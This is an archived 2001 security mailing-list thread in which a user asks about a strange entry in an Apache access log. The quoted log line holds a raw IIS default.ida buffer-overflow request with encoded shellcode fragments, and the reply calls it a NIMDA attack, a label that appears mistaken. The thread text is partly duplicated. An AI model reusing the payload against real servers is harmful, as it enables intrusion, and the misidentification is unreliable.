Mailinglist Archive: opensuse-security (670 mails)
| < Previous | Next > |
Re: [suse-security] strage log entry
- From: "Sp0oKeR" <spooker@xxxxxxxxxx>
- Date: Mon, 12 Nov 2001 16:16:58 -0200
- Message-id: <001801c16ba6$37e3be60$0200000a@xxxxxxxxxxxxxx>
It´s NIMDA attack, but if you have apache, don´t worry, just IIS have
problems with it.
Regards ...
----- Original Message -----
From: sigismund <adebe@xxxxxxxxxxxxxxxx>
To: <suse-security@xxxxxxxx>
Sent: Monday, November 12, 2001 4:07 PM
Subject: [suse-security] strage log entry
> ciao
>
> i found this on my access_log file. what are they looking for ? is this an
> attack ?
>
> 211.90.239.179 - - [12/Nov/2001:18:21:16 +0100] "GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0"
> 400 329
>
> i put this IP on my host.deny file. is this enought ?
>
>
> Thank you
>
> Alex
>
>
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> For additional commands, e-mail: suse-security-help@xxxxxxxx
>
>
problems with it.
Regards ...
----- Original Message -----
From: sigismund <adebe@xxxxxxxxxxxxxxxx>
To: <suse-security@xxxxxxxx>
Sent: Monday, November 12, 2001 4:07 PM
Subject: [suse-security] strage log entry
> ciao
>
> i found this on my access_log file. what are they looking for ? is this an
> attack ?
>
> 211.90.239.179 - - [12/Nov/2001:18:21:16 +0100] "GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
>
NNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0"
> 400 329
>
> i put this IP on my host.deny file. is this enought ?
>
>
> Thank you
>
> Alex
>
>
>
> --
> To unsubscribe, e-mail: suse-security-unsubscribe@xxxxxxxx
> For additional commands, e-mail: suse-security-help@xxxxxxxx
>
>
| < Previous | Next > |